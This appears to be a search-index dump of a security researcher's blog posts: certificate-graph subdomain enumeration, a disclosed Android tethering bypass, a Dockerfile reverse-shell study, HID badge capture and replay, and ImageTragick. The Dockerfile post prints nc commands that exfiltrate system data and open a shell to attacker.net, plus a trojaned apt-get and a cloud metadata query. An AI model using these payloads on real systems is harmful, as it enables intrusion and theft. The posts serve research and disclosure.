Instead of connecting to each host to get its certificate, we can get them all from a single log or index.\nCertificate Transparency Background Flaws in the current system of digital certificate management were made evident by high-profile security and privacy breaches caused by fraudulent certificates being issued by \u0026ldquo;trusted\u0026rdquo; CAs. The goal of Certificate Transparency is to provide an open auditing and monitoring system that lets any domain owner or certificate authority determine whether their certificates have been mistakenly issued or maliciously used. Certificate Transparency allows domain owners to be notified whenever a certificate is issued for their domain, informing them of any unauthorized certificates that may exist. In near real time!\nThe actual Certificate Transparency logs are hundreds of gigabytes in size and not indexed, so searching them is not ideal; however, there are public Certificate Transparency search engines that index all of the data for us so we can query it.\nComodo\u0026rsquo;s crt.sh Google Facebook Unfortunately, Facebook\u0026rsquo;s tool requires you to be logged into a Facebook account to use it. But it does send you instant notifications whenever it detects a new certificate issued for a domain you are monitoring.\nCertGraph Examples Subdomain Enumeration There are lots of subdomain enumeration tools already (for example Sublist3r), but they all work by either brute-forcing domains or by searching indexes like Google. CertGraph can also help enumerate subdomains, but much faster and with much more accuracy. This is because every domain CertGraph encounters is known to be a valid domain. Although CertGraph may not encounter every subdomain, it should have no false positives.\nNote For best results, use a Certificate Transparency driver with the -ct-subdomains flag.\nInternal Domain leakage CertGraph can help enumerate all domains that you may not know are publicly listed inside your certificate alt-names. 
This can sometimes lead to certificates that are valid for both internal and external hosts being discovered externally, sharing the internal host names with the public. Below is an example of this.\n$ certgraph -driver crtsh -ct-subdomains netflix.com | grep internal staging-npp-internal.netflix.com issues-internal.nrd.netflix.net dev-npp-internal.netflix.com npp-internal.netflix.com api-internal.test.netflix.com api-int-internal.netflix.com api-int-internal.test.netflix.com ... Misconfigured Certificates The graph visualization that CertGraph can output can be thought of as a trust graph. If a certificate is valid for one domain, which is being hosted with a cert for another domain, we can say that the second domain must trust the owner of the first domain, as they have the certificate for it. This idea can be expanded and chained to incorporate many certificates. If your graph includes many domains which should not have any trust relationship with you, this may indicate a problem.\nBelow is a real example of this, with the domains changed to red, green, and blue to make it more obvious and to protect the guilty.\n$ certgraph -json blue.com \u0026gt; data.json\nIn this example, Red, Green, and Blue are all different organizations, and we run certgraph on only blue.com, which enumerated a handful of Blue\u0026rsquo;s other domains and certificates. However, somehow certgraph ended up reaching green.com and then red.com. How is this possible? It turns out blue.com was serving an SSL certificate for green.com in an alt-name and www.green.com had an SSL certificate for red.com.\nAfter some digging, I learned that Blue previously owned green.com and sold it to Red. But Blue still possesses a valid SSL certificate for green.com and is serving it from blue.com. At this point Blue can SSL man-in-the-middle Red\u0026rsquo;s green.com domain. Take a minute to let that sink in.\nCDNs If any of the crawled domains use a CDN, CertGraph will skip the CDN certificate by default. 
CDN certificates may contain hundreds of unrelated alt-names, introducing lots of unwanted noise into the data. The -cdn flag causes CertGraph to include CDN results in the search instead of skipping them.\nHow CertGraph Works Currently CertGraph supports 4 different drivers, which are the ways CertGraph searches and acquires certificates for domains.\nhttp this connects to domains on port 443 and collects the certificate from the TLS handshake. smtp like http, but looks up the MX records of the domains and uses port 25 with starttls. crtsh searches Certificate Transparency using crt.sh google like crtsh but uses Google\u0026rsquo;s Certificate Transparency search tool Methodology Under the hood, CertGraph is rather simple. It uses a modified breadth-first search to allow it to crawl the graph while it is being created, and in parallel.\nWildcard domains are normalized to their parent domain. Unfortunately, this is required because we do not know which subdomain host to connect to. Example: *.example.com → example.com\nCertgraph also has a few output modes:\nDomain list - list all the domains found, 1 per line as they are found (default) Domain adjacency list - prints more details such as host status, domain\u0026rsquo;s certificate hash, and depth from root in graph (-details flag) JSON Graph - JSON output for graphing on the Web UI (-json flag) Save Certificates - Save the certificates in PEM format for later analysis (-save flag) Examples Basic usage:\n$ ./certgraph -list eff.org eff.org staging.eff.org leez-dev-supporters.eff.org micah-dev2-supporters.eff.org maps.eff.org web6.eff.org https-everywhere-atlas.eff.org s.eff.org max-dev-supporters.eff.org httpse-atlas.eff.org kittens.eff.org dev.eff.org max-dev-www.eff.org atlas.eff.org The domain adjacency list is printed in the following format:\nNode Depth Status Cert-Fingerprint [Edge1 Edge2 ... 
EdgeN]\n$ ./certgraph -details eff.org eff.org 0 Good 5C699512FD8763FC50A105A14DB2526A10AE6EAC3E79F5F44A7F99E90189FBE5 [maps.eff.org web6.eff.org eff.org atlas.eff.org https-everywhere-atlas.eff.org httpse-atlas.eff.org kittens.eff.org] web6.eff.org 1 Good AF842FA69A720E9FB2F37BAF723A20F80B8C2072693E55D0A1EA78C7BABE2699 [*.eff.org *.dev.eff.org *.s.eff.org *.staging.eff.org] https-everywhere-atlas.eff.org 1 Good 5C699512FD8763FC50A105A14DB2526A10AE6EAC3E79F5F44A7F99E90189FBE5 [kittens.eff.org maps.eff.org web6.eff.org eff.org atlas.eff.org https-everywhere-atlas.eff.org httpse-atlas.eff.org] maps.eff.org 1 Good 5C699512FD8763FC50A105A14DB2526A10AE6EAC3E79F5F44A7F99E90189FBE5 [maps.eff.org web6.eff.org eff.org atlas.eff.org https-everywhere-atlas.eff.org httpse-atlas.eff.org kittens.eff.org] atlas.eff.org 1 Good 5C699512FD8763FC50A105A14DB2526A10AE6EAC3E79F5F44A7F99E90189FBE5 [eff.org atlas.eff.org https-everywhere-atlas.eff.org httpse-atlas.eff.org kittens.eff.org maps.eff.org web6.eff.org] httpse-atlas.eff.org 1 Good 5C699512FD8763FC50A105A14DB2526A10AE6EAC3E79F5F44A7F99E90189FBE5 [eff.org atlas.eff.org https-everywhere-atlas.eff.org httpse-atlas.eff.org kittens.eff.org maps.eff.org web6.eff.org] kittens.eff.org 1 Good 5C699512FD8763FC50A105A14DB2526A10AE6EAC3E79F5F44A7F99E90189FBE5 [eff.org atlas.eff.org https-everywhere-atlas.eff.org httpse-atlas.eff.org kittens.eff.org maps.eff.org web6.eff.org] dev.eff.org 2 No Host [] s.eff.org 2 Good AF842FA69A720E9FB2F37BAF723A20F80B8C2072693E55D0A1EA78C7BABE2699 [*.eff.org *.dev.eff.org *.s.eff.org *.staging.eff.org] staging.eff.org 2 Good AC3933B1B95BA5254F43ADBE5E3E38E539C74456EE2D00493F0B2F38F991D54F [max-dev-supporters.eff.org leez-dev-supporters.eff.org max-dev-www.eff.org micah-dev2-supporters.eff.org staging.eff.org] leez-dev-supporters.eff.org 3 Good AC3933B1B95BA5254F43ADBE5E3E38E539C74456EE2D00493F0B2F38F991D54F [staging.eff.org max-dev-supporters.eff.org leez-dev-supporters.eff.org max-dev-www.eff.org 
micah-dev2-supporters.eff.org] micah-dev2-supporters.eff.org 3 Good AC3933B1B95BA5254F43ADBE5E3E38E539C74456EE2D00493F0B2F38F991D54F [max-dev-supporters.eff.org leez-dev-supporters.eff.org max-dev-www.eff.org micah-dev2-supporters.eff.org staging.eff.org] max-dev-supporters.eff.org 3 Good AC3933B1B95BA5254F43ADBE5E3E38E539C74456EE2D00493F0B2F38F991D54F [max-dev-supporters.eff.org leez-dev-supporters.eff.org max-dev-www.eff.org micah-dev2-supporters.eff.org staging.eff.org] max-dev-www.eff.org 3 Good AC3933B1B95BA5254F43ADBE5E3E38E539C74456EE2D00493F0B2F38F991D54F [max-dev-www.eff.org micah-dev2-supporters.eff.org staging.eff.org max-dev-supporters.eff.org leez-dev-supporters.eff.org] Web Interface CertGraph also includes a simple web interface for easy visualization of the graph. It can be accessed online at https://lanrat.github.io/certgraph or offline in the docs folder in the program source code.\nThe web UI is a single-page web interface that can visualize the graph output when using the -json flag. It can be run entirely offline.\nExample: $ certgraph -json example.com \u0026gt; example-graph.json\nYou can load your data into the web interface by uploading, pasting, or linking to a JSON file using the data dropdown menu.\nFor more information and examples, check out the project README on GitHub\nShmoocon 2018 Talk ","permalink":"https://lanrat.com/posts/certgraph/","summary":"\u003cp\u003e\u003ca href=\"https://github.com/lanrat/certgraph\"\u003eCertgraph\u003c/a\u003e is a tool I\u0026rsquo;ve been developing to scan and graph the network of SSL certificate alternative names. It can be used to find other domains that belong to an organization that may be several degrees removed and not always obvious.\u003c/p\u003e\n\u003ch1 id=\"background\"\u003eBackground\u003c/h1\u003e\n\u003cp\u003eThe idea for this project came about after examining the SSL certificate for \u003ca href=\"https://xkcd.com\"\u003eXKCD.com\u003c/a\u003e. 
If you look closely at the screenshot below you will see that the SSL certificate used on XKCD.com is also valid for many domains which have no relationship to XKCD or \u003ca href=\"https://en.wikipedia.org/wiki/Randall_Munroe\"\u003eRandall Munroe\u003c/a\u003e.\u003c/p\u003e","title":"CertGraph"},{"content":"On most unrooted, stock, Android phones, enabling tethering will run a \u0026ldquo;Provisioning Check\u0026rdquo; with your wireless provider to ensure that your data plan allows tethering. This post documents Tethr, a way to bypass the provisioning check on Android devices prior to version 7.1.2. After discovering this method, I reported it to the Android bug bounty, which resulted in a fix and CVE-2017-0554.\nBackground The ability to tether is controlled by your device\u0026rsquo;s build.prop file, usually located at /system/build.prop. The default is to require the provisioning check before enabling tethering, but it can be bypassed by adding the following line:\nnet.tethering.noprovisioning=true Unrooted devices can\u0026rsquo;t edit /system/build.prop, so it is up to the ROM manufacturer to set this property. Some devices like the Google Nexus 6P default to net.tethering.noprovisioning=true, but this is the exception, not the norm. The Google Nexus 5X, Pixel, and Pixel 2 all perform provisioning checks.\nOverview When enabling tethering on Android, the OS will first do a provisioning check with the carrier to determine if the user\u0026rsquo;s plan allows tethering. If allowed, tethering is enabled; otherwise, a message is displayed to the user.\nIf there is no SIM card inserted, then no provisioning check is performed, and tethering is allowed. 
Additionally, if tethering is enabled on a phone with no SIM (not that this scenario would be of much use) and a SIM is then inserted, tethering is disabled as it should be.\nHowever, if tethering is enabled while the radio is connecting, no provisioning check will be performed, and tethering will remain enabled after the radio connection is established.\nThe first issue I discovered is the ability for a user-installed application on a stock OS to reset the cellular modem. The second issue is the lack of a provisioning check once the cellular modem has finished reconnecting.\nTogether these bugs allow the Android OS to operate as if net.tethering.noprovisioning=true were specified in build.prop, even if it is not.\nTethr Demo Before I dive into the details, observe the following video, which demonstrates that when enabling tethering in the Android system UI, a provisioning check is performed and tethering is not allowed. Then, when using the Tethr demo app, the signal meter loses signal when the modem is resetting, and then tethering is successfully enabled.\nSource code: github.com/lanrat/tethr\nCompiled APK: Tethr.apk\nIssue 1: Resetting radio via reflection Java Reflection in Android can be used to allow application code to make calls to undocumented or hidden APIs. This is not officially supported, and often strongly discouraged. It can, however, allow app developers to do unsupported things, or in this case, bypass a permission check.\nResetting the cellular radio is performed in CellRefresh.java by calling CellRefresh.Refresh(). 
CellRefresh does a number of things to reset the cellular connection on most Android versions, but on Android 6+ the following reflections are used:\ngetSystemService(Context.TELEPHONY_SERVICE).getITelephony().setCellInfoListRate() getSystemService(Context.CONNECTIVITY_SERVICE).mService.setMobileDataEnabled(); Older Android versions use the following reflections:\ngetSystemService(Context.CONNECTIVITY_SERVICE).mService.setRadio(); getSystemService(Context.TELEPHONY_SERVICE).getITelephony().disableDataConnectivity() getSystemService(Context.TELEPHONY_SERVICE).getITelephony().enableDataConnectivity() Solution The methods used should require the application to have system or privileged permissions.\nIssue 2: Tethering provisioning check race condition In order to exploit the race condition and bypass the tethering provisioning check, an Android PhoneStateListener and AccessibilityService are used to programmatically enable the desired tethering mode at exactly the right time.\nFirst, the network is reset as described above. While the reset is being performed, the PhoneStateListener (TetherPhoneStateListener.java) listens for when the cellular network is down and then starts the system\u0026rsquo;s settings tethering dialog, where the AccessibilityService (TetherAccessibilityService.java) finds the correct UI switch and toggles it.\nThe AccessibilityService and PhoneStateListener are not strictly required for this exploit. The user can manually toggle tethering at the correct time to have the same effect. 
Automating the process with an AccessibilityService makes the process easier to reproduce.\nSolution The provisioning check should happen each time the radio is reset when tethering is enabled, in addition to checking when enabling tethering.\nTesting Tested Wireless Carriers:\nVerizon AT\u0026amp;T Tested phones (all stock, locked bootloaders, OEM OS):\nNexus 5X running Android 6.0.1 Nexus 5X running Android 7.0.0 Nexus 5X running Android 7.1.1 Samsung Galaxy S7 running Android 6.0.1 Untested but should also work on:\nPixel (XL) Other non-Nexus devices that perform a provisioning check As the Nexus 6P already has net.tethering.noprovisioning=true set in its stock build.prop, there is no need for this exploit.\nFixes After submitting to the Android Bug Bounty, Google created two patches for Android 7.1.2 which fixed this issue.\nPatch 1: Added permission check for setCellInfoListRate\nPatch 2: Fixed the logic for tethering provisioning re-evaluation\nAfter fixing the issue, Google was kind enough to give me a Pixel XL for reporting it to their bug bounty.\n","permalink":"https://lanrat.com/posts/tethr/","summary":"\u003cp\u003eOn most unrooted, stock, Android phones, enabling \u003ca href=\"https://support.google.com/nexus/answer/2812516?hl=en\"\u003etethering\u003c/a\u003e will run a \u0026ldquo;Provisioning Check\u0026rdquo; with your wireless provider to ensure that your data plan allows tethering. This post documents \u003cstrong\u003eTethr\u003c/strong\u003e, a way to bypass the provisioning check on Android devices prior to version 7.1.2. 
After discovering this method I reported it to the Android bug bounty, which fixed the issue and assigned \u003ca href=\"https://source.android.com/security/bulletin/2017-04-01#eop-in-telephony\"\u003eCVE-2017-0554\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003e\u003cimg alt=\"Tethr Screenshot\" loading=\"lazy\" src=\"/posts/tethr/images/Tethr-Screenshot-small.webp\"\u003e\u003c/p\u003e\n\u003ch1 id=\"background\"\u003eBackground\u003c/h1\u003e\n\u003cp\u003eThe ability to tether is controlled by your device\u0026rsquo;s \u003ccode\u003ebuild.prop\u003c/code\u003e file, usually located at \u003ccode\u003e/system/build.prop\u003c/code\u003e. The default is to require the provisioning check before enabling tethering, but it can be bypassed by adding the following line:\u003c/p\u003e","title":"Tethr: Android Tethering Provisioning Check Bypass (CVE-2017-0554)"},{"content":"Tethr is an Android application that demonstrates CVE-2017-0554, a vulnerability that allows bypassing carrier tethering provisioning checks on unrooted devices. The proof-of-concept app exploits system property manipulation to enable mobile hotspot functionality without carrier approval.\nThe vulnerability affects Android versions prior to 7.1.2 by allowing modification of tethering-related system properties through reflection and system service manipulation. This research was conducted to highlight security weaknesses in Android\u0026rsquo;s tethering permission model.\n","permalink":"https://lanrat.com/projects/tethr/","summary":"\u003cp\u003eTethr is an Android application that demonstrates CVE-2017-0554, a vulnerability that allows bypassing carrier tethering provisioning checks on unrooted devices.
The proof-of-concept app exploits system property manipulation to enable mobile hotspot functionality without carrier approval.\u003c/p\u003e\n\u003cp\u003eThe vulnerability affects Android versions prior to 7.1.2 by allowing modification of tethering-related system properties through reflection and system service manipulation. This research was conducted to highlight security weaknesses in Android\u0026rsquo;s tethering permission model.\u003c/p\u003e","title":"Tethr"},{"content":"For those of you not in the know, ambergris is defined as:\na wax-like substance that originates as a secretion in the intestines of the sperm whale, found floating in tropical seas and used in perfume manufacture.\nHowever, that will not be what this post is about (sorry to disappoint). Instead, I\u0026rsquo;ll present what happens when building an image on Docker that contains a reverse shell in the Dockerfile.\nDocker First, let me start with a very brief description of Docker. If you are already familiar with Docker you should skip to the next section.\nDocker is an open-source project that automates the creation of environments for Linux applications inside software containers.\nDocker containers wrap up a piece of software in a complete filesystem that contains everything it needs to run: code, runtime, system tools, system libraries - anything you can install on a server. This guarantees that it will always run the same, regardless of the environment it is running in.\nDocker vs. 
Virtual Machines Unlike traditional virtual machines, Docker images do not contain the entire OS, just the libraries and resources needed by the application.\nVIRTUAL MACHINES: Virtual machines include the application, the necessary binaries and libraries, and an entire guest operating system \u0026ndash; all of which can amount to tens of GBs\nCONTAINERS: Containers include the application and all of its dependencies \u0026ndash; but share the kernel with other containers, running as isolated processes in user space on the host operating system. Docker containers are not tied to any specific infrastructure: they run on any computer, on any infrastructure, and in any cloud.\nDockerfile The Dockerfile is a set of instructions executed by docker to build an image which can later be run. Below is an example Dockerfile which after being built can be run to print Hello World to stdout.\nFROM debian ENV MESSAGE \u0026#34;Hello World\u0026#34; RUN echo \u0026#34;$MESSAGE\u0026#34; \u0026gt; /message.txt CMD cat /message.txt The RUN command in a Dockerfile runs when docker is building the image. CMD or ENTRYPOINT run when the image is being run. Typically all setup for the image is performed in RUN commands while the application the image is being built for starts with the CMD command.\nDocker Hub Docker Hub is a cloud-based registry service which allows you to link to code repositories, build your images and test them, store manually pushed images, and link to Docker Cloud so you can deploy images to your hosts. It provides a centralized resource for container image discovery, distribution and change management, user and team collaboration, and workflow automation throughout the development pipeline.\nEverything should be in the cloud right?
☁\nContainer Lifecycle $ docker build Build an image from a Dockerfile $ docker pull Pull a pre-built image from the Docker Hub $ docker run Run a prebuilt container; can also build or pull an image if it does not exist locally\u0026hellip; Ambergris A reverse shell inside your Dockerfile\nSo, what would happen if we put a reverse shell in a Dockerfile using RUN commands? Below is a Dockerfile I created to test just that.\nFROM busybox ENV POC_HOST attacker.net ENV POC_PORT 1337 RUN echo \u0026#34;Please NEVER build this image!\u0026#34; RUN (echo \u0026#34;== UNAME ==\u0026#34;; uname -a) | nc $POC_HOST $POC_PORT RUN (echo \u0026#34;== ID ==\u0026#34;; id) | nc $POC_HOST $POC_PORT RUN (echo \u0026#34;== IP ==\u0026#34;; ip a) | nc $POC_HOST $POC_PORT RUN (echo \u0026#34;== DMESG ==\u0026#34;; dmesg) | nc $POC_HOST $POC_PORT RUN nc $POC_HOST $POC_PORT -e /bin/sh CMD sh This Dockerfile sends our server located at attacker.net the output of uname, id, ip a, dmesg, and finally, a reverse shell.\nLocal Builds In order to test this, build this image locally, replacing attacker.net with your own domain, and have a shell listener on port 1337.\ndocker build . Even though the user runs the reverse shell as root, it is not a fully privileged root. You are running as root inside a Docker container. You have uid=0, gid=0, but some system level privileges may not be present like NET_ADMIN preventing you from putting the network interface into promiscuous mode. Additionally you will have a virtual network adapter behind a virtual NAT on the host and a different root file-system.\nAlternatively the image can be built locally from a remote source such as GitHub!\ndocker build github.com/lanrat/ambergris This will have the same effect as the local Dockerfile above. However, in this scenario the Dockerfile containing the reverse shell is never saved on the image-building system, preventing the user from seeing what commands they are running.
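The other end of those nc pipes can be any TCP listener. As a sketch of the collection side (the helper names are mine, not from the original post; `nc -l -p 1337` works just as well):

```python
import socket

def collect(conn, bufsize=4096):
    """Read everything the connecting build sends until it closes."""
    chunks = []
    while True:
        data = conn.recv(bufsize)
        if not data:
            break
        chunks.append(data)
    return b"".join(chunks)

def serve_once(port=1337):
    """Accept a single connection (e.g. one docker build) and dump it."""
    with socket.create_server(("", port)) as srv:
        conn, addr = srv.accept()
        with conn:
            print(addr[0], collect(conn).decode(errors="replace"))
```

Running `serve_once()` on the listening host before the build captures the piped uname/id/ip/dmesg output; the final `nc -e /bin/sh` line needs an interactive handler instead.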
This can be just as dangerous as pipe to sh.\nRemote Builds Docker Hub What if we send our \u0026ldquo;backdoored\u0026rdquo; Dockerfile to the Docker Hub to be built? Well, not surprisingly it is built! And as part of the building process the reverse shell is run!\nThe Docker Hub is not the only cloud image building service in town, QUAY is another, let\u0026rsquo;s test it!\nAnother shell!\nBuild Environment Both Docker Hub and QUAY run on AWS. So the shells we get are inside a Docker container on an AWS instance.\nDocker Hub Hardware 2.50GHz Intel Xeon CPU 4GB Ram 40GB HD space Can read host dmesg kernel stack traces of host Apparmor rules networking information vpn info limited information on previous containers built Limits execution time to 2 hours QUAY Hardware 2.40GHz Intel Xeon CPU x2 4GB Ram 50GB HD space Can read host dmesg kernel stack traces of host Apparmor rules networking information limited information on previous containers built Limits execution time to 1 hour automatically runs 3 times! Both the official Docker Hub and QUAY have similar environments and limits on build execution time. Like in a normal Docker container the dmesg command will return information about the host system which may contain sensitive information.\nWhat can I do with this anyways? You basically get a free AWS instance that reboots every 1-2 hours with no persistent storage. But with a few clever hacks these limitations can be overcome.\nExample usages:\nMine Bitcoin Send spam Botnet Tor node Password cracking Proxy Obfuscation Even if you view the Dockerfile of an image before you build it, it is still possible to end up with a reverse shell on your system. Examine the following example:\nFROM lanrat/base RUN apt-get install myapp CMD myapp Looks safe right? 
Not so fast\u0026hellip;\nSuppose the Dockerfile for lanrat/base contained the following:\nFROM debian ENV POC_HOST attacker.net ENV POC_PORT 1337 RUN echo \u0026#34;Please NEVER build this image!\u0026#34; RUN echo -e \u0026#39;#!/bin/sh \\nnc $POC_HOST $POC_PORT -e /bin/sh\u0026#39; \u0026gt; /usr/bin/apt-get RUN chmod +x /usr/bin/apt-get CMD sh This effectively replaces the apt-get command with a reverse shell. So when the image using lanrat/base is built it calls apt-get thinking it is going to install myapp but it really starts a reverse shell.\nThis can be taken a step further by having the fake apt-get command pass its arguments to the real apt-get and fork the reverse shell to the background. As the image would appear to be built successfully it may go unnoticed, but every time it is built, or even run, the attacker\u0026rsquo;s code may run.\nRunning Inside AWS Both the Docker Hub and Quay use AWS to build the Docker images. This means that the shell you get inside a Dockerfile when building on one of these services is inside the AWS infrastructure.\nI found that within this environment Docker containers being built can make requests to the AWS Instance Metadata API. This API may leak information such as access tokens, usernames/passwords for API/infrastructure and configuration details. The AWS Instance Metadata API is accessible by making HTTP requests to the IP address 169.254.169.254.
For Example:\ncurl http://169.254.169.254/latest/user-data The Docker Hub had very little information accessible from this API, but QUAY had more of its environment\u0026rsquo;s configuration accessible, including usernames, keys, and access tokens.\nTakeaways Know where your image comes from Know where your base image\u0026rsquo;s base image comes from Understand that docker build is just as dangerous as docker run with untrusted images Block access to the AWS Instance Metadata API if you allow users to make HTTP requests from your infrastructure Disclosure Docker 8/29/16 - My initial disclosure 8/29/16 - Response acknowledging potential vulnerability. Informed me that each Docker build is performed on a fresh VM 8/30/16 - AWS Instance Metadata API blocked from within Docker build environment QUAY (CoreOS) 8/30/16 - My initial disclosure 8/30/16 - Response acknowledging as expected behavior. 8/30/16 - I provided example of data leaking on the AWS Instance Metadata API 8/30/16 - Removed sensitive data from AWS Instance Metadata API Bonus Video ","permalink":"https://lanrat.com/posts/ambergris/","summary":"\u003cp\u003eFor those of you not in the know, ambergris is defined as:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003ea wax-like substance that originates as a secretion in the intestines\nof the sperm whale, found floating in tropical seas and used in perfume manufacture.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e\u003cimg alt=\"Photo of Whale Barfing\" loading=\"lazy\" src=\"/posts/ambergris/images/whale-barf.webp\"\u003e\u003c/p\u003e\n\u003cp\u003eHowever, that will not be what this post is about (sorry to disappoint). Instead, I\u0026rsquo;ll present what happens when building an image on Docker that contains a reverse shell in the \u003ccode\u003eDockerfile\u003c/code\u003e.\u003c/p\u003e","title":"Ambergris"},{"content":"A while ago I came into possession of a few HID iClass readers.
After collecting dust in my project drawer for a few months I decided to find a fun use for them, which ended up in the project I call Badgy.\nBackground The back of each HID reader has 10 colored wires coming out of it. Luckily the readers also had a nice sticker telling me which wire was which.\nThe readers are nice enough to accept a wide range of input voltages, functioning from 5v to 16v. The readers speak the Wiegand protocol which is a simple and well documented protocol for sending bits over a wire.\nWiegand Overview\nTwo Data lines (data0 \u0026amp; data1) Default to line high (~5v) Falling edge represents a single bit Variable bit length Test badges use 35 bits Noise can easily add extra bits on the line Use a well insulated wire Error checking can be implemented at a higher level if desired CRC or parity bit I started off using an Arduino Wiegand library to read raw data from the card to prove the readers worked correctly. This allowed me to investigate the other non-Wiegand and power lines going into the reader. In short, the extra pins allow you to override the LED light color, beeper, and test the infra-red tamper sensor status (more on that later).\nCard Code Format The test badges I had use the Corporate 1000 data format. This format is used by most buildings that use the HID access cards. The format specifies parity bits, organization ID, and badge ID.\nMy test badges contain a 35 bit long code. The bit order for each organization can also be randomized for additional security via obscurity. With a large enough sample set of badges, identifying the bits that represent the organization ID can be trivial (they will be the bits that are the same on all scanned badges for the same organization). The rest are for the individual badge ID and any parity bits used.\nEncryption The RFID information going between the physical badge and reader is encrypted, but the connection from the reader to the wire inside the wall is plain-text.
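Finding the "bits that are the same on all scanned badges" can be done mechanically. A small sketch (my own illustration, not the Badgy code):

```python
def constant_bit_positions(badges):
    """Given equal-length badge bit strings, return the positions whose
    value never changes across badges -- candidates for the organization
    ID and any fixed parity bits. The remaining positions vary per badge."""
    width = len(badges[0])
    assert all(len(b) == width for b in badges), "badges must be equal length"
    return [i for i in range(width) if len({b[i] for b in badges}) == 1]
```

With a handful of 35-bit reads from the same organization, the returned positions quickly converge on the fixed fields.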
The encryption keys used for the badge reader can be set by the organization that implements them, however most use the default keys from the factory.\nThis is not due to security negligence, but for functionality reasons. The badges and readers can only operate on a single key. So if two organizations, A and B, occupy the same building on different floors with a shared elevator system that requires a badge scan to operate, both organizations will need to use the same keys to allow both sets of employees to operate the elevator. Now suppose that organization B has another office somewhere else in the world and employees regularly travel between the offices. They want this office to use the same key to allow their employees to use one badge for all their buildings. If this second location is shared with organization C, then organization C will also need to use the same keys. So now organization C and A will be using the same keys even though they may not share any buildings. This can easily expand to hundreds or more organizations as each organization adds new offices and expands globally.\nCloning a physical badge (beyond the scope of this post) will require the private encryption key. The private key is stored in the HID reader in order to decrypt the response from the badge. Previous work has already been done to extract this key.\nReplay Now that the protocol and pins for the HID badge scanner are understood I wanted to see if it would be possible to use a micro-controller to emulate the reader to inject previously scanned badges into the system allowing a potential adversary access to a facility they have a badge code for but lack the physical badge at the time of entry.\nThe threat model here is the adversary has the ability to get the badge data but is unable to physically get the badge. 
Perhaps they scanned it while standing next to the victim on a crowded bus or by bumping into them on the street.\nFor this attack I used the same Arduino I used to read badges in the Background section but modified it so that the Arduino sends a pre-saved badge to whatever it is connected to. I could now send badge codes from one Arduino to another using one Arduino as a badge reader and another as the badge emulator.\nThe controller Arduino has no way to differentiate between the real HID reader and the Arduino acting as an emulated reader. In theory this will also work with the actual HID controller/access system, but unfortunately I do not have one to test on.\nAll is not lost: HID has thought of this and added a tamper line to the HID reader to detect someone disconnecting the HID reader, which is located on the outside of the secured perimeter. On the HID readers I tested, the tamper line is connected to an IR sensor located on the back of the reader next to an IR LED. The IR light bounces off a reflective sticker on the back of the mounting plate to detect if the reader is ever removed from the mounting plate.\nHowever, this only applies to removing the sensor from the wall the way it was designed to be removed. If removed in what will likely be a more destructive way, it would be possible to access the tamper lines without triggering the tamper sensor, allowing an adversary to connect into the line, injecting their own \u0026ldquo;tamper OK\u0026rdquo; signal while disconnecting the real HID reader and connecting their micro-controller undetected. From here they can replay any collected badge codes or even attempt brute-forcing access codes.\nBuilding the Badge Collector In order to easily collect as many badge codes as possible I wanted to create a self-contained badge reader.
The badge reader should be self-powered, and have the ability to save collected badges to persistent storage on itself and ideally offer a means to transmit them wirelessly to a receiver nearby. I was able to accomplish all this and more with a Raspberry Pi zero and USB battery pack.\nThe wiring is as simple as connecting the data0 \u0026amp; data1 Wiegand pins to two of the GPIO pins of the Raspberry Pi, and connecting the 5v output of the USB battery pack to the power inputs of both the Pi and HID reader.\nThe Raspberry Pi runs headless Debian and a program that can be found on GitHub that listens for incoming badge codes and saves them to a log file on the Pi\u0026rsquo;s SD card.\nWireless Data Exfiltration So far this badge collector will work great if hung next to an unsuspecting door. Employees are likely to scan badges to see if they will have access to this newly \u0026ldquo;secured\u0026rdquo; area. But if someone discovers it and removes the reader, what then? Aside from losing the hardware, all the collected badge access codes are gone. Or are they?\nThe little-known PiFm library allows Raspberry Pis to transmit over FM by bit-banging FM over GPIO pin 7. Using this we can convert the log data to audio using espeak and then send it to the FM transmitter provided by PiFm. All we need to do is attach a wire to GPIO Pin 7 to act as the antenna.\nWith this addition, every time a badge is scanned the data is logged to the Pi\u0026rsquo;s SD card and transmitted over FM where a nearby FM recorder can make a backup of the badge data.\nDemo ","permalink":"https://lanrat.com/posts/badgy/","summary":"\u003cp\u003eA while ago I came into possession of a few HID iClass readers.
After collecting dust in my project drawer for a few months I decided to find a fun use for them, which ended up in the project I call \u003ca href=\"https://github.com/lanrat/badgy\"\u003eBadgy\u003c/a\u003e.\u003c/p\u003e\n\u003ch2 id=\"background\"\u003eBackground\u003c/h2\u003e\n\u003cp\u003eThe back of the HID readers have 10 colored wires coming out of them. Luckily the readers also had a nice sticker telling me which wire was what.\u003c/p\u003e","title":"Badgy"},{"content":"CertGraph crawls SSL certificates to map domain relationships through certificate alternate names. The tool builds a directed graph where domains are nodes and certificate alternative names create edges between related domains.\nThe program performs hostname enumeration by following certificate relationships, revealing domain connections that may not be apparent through traditional DNS enumeration. It outputs data in various formats including graphical representations for network topology analysis.\n","permalink":"https://lanrat.com/projects/certgraph/","summary":"\u003cp\u003eCertGraph crawls SSL certificates to map domain relationships through certificate alternate names. The tool builds a directed graph where domains are nodes and certificate alternative names create edges between related domains.\u003c/p\u003e\n\u003cp\u003eThe program performs hostname enumeration by following certificate relationships, revealing domain connections that may not be apparent through traditional DNS enumeration. It outputs data in various formats including graphical representations for network topology analysis.\u003c/p\u003e","title":"CertGraph"},{"content":"A collection of proof-of-concept exploits demonstrating critical vulnerabilities in ImageMagick (CVE-2016-3714 through CVE-2016-3717). 
These vulnerabilities allow remote code execution, server-side request forgery, file deletion, and local file disclosure through maliciously crafted image files.\nThe project provides test scripts and example payloads to help developers and security researchers understand the attack vectors and implement proper mitigations. The vulnerabilities affect web applications using ImageMagick or related libraries for image processing, making this a significant security concern for many web services.\n","permalink":"https://lanrat.com/projects/imagetragick/","summary":"\u003cp\u003eA collection of proof-of-concept exploits demonstrating critical vulnerabilities in ImageMagick (CVE-2016-3714 through CVE-2016-3717). These vulnerabilities allow remote code execution, server-side request forgery, file deletion, and local file disclosure through maliciously crafted image files.\u003c/p\u003e\n\u003cp\u003eThe project provides test scripts and example payloads to help developers and security researchers understand the attack vectors and implement proper mitigations. The vulnerabilities affect web applications using ImageMagick or related libraries for image processing, making this a significant security concern for many web services.\u003c/p\u003e","title":"ImageTragick"},{"content":"Last week at DerbyCon 5.0 the CircleCityCon folks had a booth with a challenge, the Challenge of Tiamat\u0026rsquo;s Eye.\n@CircleCityCon: Can you solve the Puzzle of Tiamat\u0026#39;s Eye? Visit our booth at @DerbyCon to take the challenge! 